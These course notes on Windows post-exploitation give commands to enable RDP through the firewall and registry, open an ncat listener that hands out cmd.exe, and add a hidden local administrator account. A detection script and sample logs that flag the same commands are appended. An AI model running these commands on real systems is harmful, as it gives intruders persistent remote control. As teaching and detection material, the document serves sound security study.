Course: Joe Perry on "Post Exploitation Hacking" at Cybrary
I. Remote Desktop Protocol - RDP
* Windows native RDP
* Chrome RDP (or any other third-party RDP)

Setting up the Windows Firewall
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
• netsh – network administration tool
• advfirewall – identifies that you're working with the Windows "advanced" firewall
• firewall – specifies that this is an actual firewall operation, not something else governed by advfirewall
• set rule group="remote desktop" – assigns a value to that specific rule group
• enable=Yes – allow RDP connections

Editing the registry key
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
• reg add – adds a new entry to the registry
• "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" – the key being modified
• /v fDenyTSConnections – the field ("value") being set
• /t REG_DWORD – the data type (Int/DWORD/string/etc.)
• /d 0 – the actual value corresponding to the field label
• /f – force

II. Ncat Backdoor
ncat -lkp 51000 -e "cmd.exe"
• -lkp – listen persistently on port 51000
• -e "cmd.exe" – when a connection is received, execute this command and take control of the I/O pipes

III. New User
net user /add Acct4 ThisPassW0rd
net localgroup Administrators /add Acct4

IV. Scheduled arrival
Schtasks
At
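Added example (not part of the course notes): a detection sketch that flags the commands from sections I-III when they appear in process-creation logs with command-line capture. The rule labels, function names, hostnames and sample events are constructed for illustration.

```python
import re

# Map typographic quotes/dashes (common in pasted notes) to ASCII before matching.
_ASCII = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2013": "-", "\u2014": "-"})

def normalise(cmdline):
    return re.sub(r"\s+", " ", cmdline.translate(_ASCII)).strip().lower()

# One rule per command in the notes, matched against the normalised command line.
RULES = [
    ("rdp-firewall-enabled", re.compile(
        r'\bnetsh(\.exe)?"? advfirewall firewall set rule '
        r'group="?remote desktop"? new enable=yes')),
    ("rdp-registry-enabled", re.compile(
        r'\breg(\.exe)?"? add .*\\control\\terminal server"? '
        r'.*/v fdenytsconnections\b.*/d 0\b')),
    ("ncat-exec-listener", re.compile(   # needs a listen flag AND an exec flag
        r'\bncat(\.exe)?"?(?=.* (?:-[a-z]*l[a-z]*|--listen)(?: |$))'
        r'(?=.* (?:-e|--exec|-c|--sh-exec) )')),
    ("local-user-added", re.compile(r'\bnet1?(\.exe)?"? user (?=.*/add\b)')),
    ("local-admin-added", re.compile(
        r'\bnet1?(\.exe)?"? localgroup "?administrators"? (?=.*/add\b)')),
]

def detect(cmdline):
    """Return the labels of every rule the command line matches."""
    norm = normalise(cmdline)
    return [label for label, rx in RULES if rx.search(norm)]

def triage(events):
    """Group hits by host; events are (host, command_line) pairs."""
    hits = {}
    for host, cmdline in events:
        for label in detect(cmdline):
            hits.setdefault(host, []).append(label)
    return hits

# Constructed sample events (hostnames are hypothetical), not real log data.
SAMPLE_EVENTS = [
    ("WS-01", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" '
              r'/v fDenyTSConnections /t REG_DWORD /d 0 /f'),
    ("WS-01", 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'),
    ("WS-01", "net localgroup Administrators /add Acct4"),
    ("WS-02", r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" '
              r'/v fDenyTSConnections /t REG_DWORD /d 1 /f'),   # disables RDP: no hit
    ("WS-02", "ncat -l 51000"),                                  # no exec flag: no hit
]

if __name__ == "__main__":
    for host, labels in triage(SAMPLE_EVENTS).items():
        print(host, labels)
```

Several hits on one host within a short window (RDP enabled plus a new local administrator) are a stronger signal than any single rule, since each command also has legitimate administrative uses.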
Author: Vitali Kremez
July 2016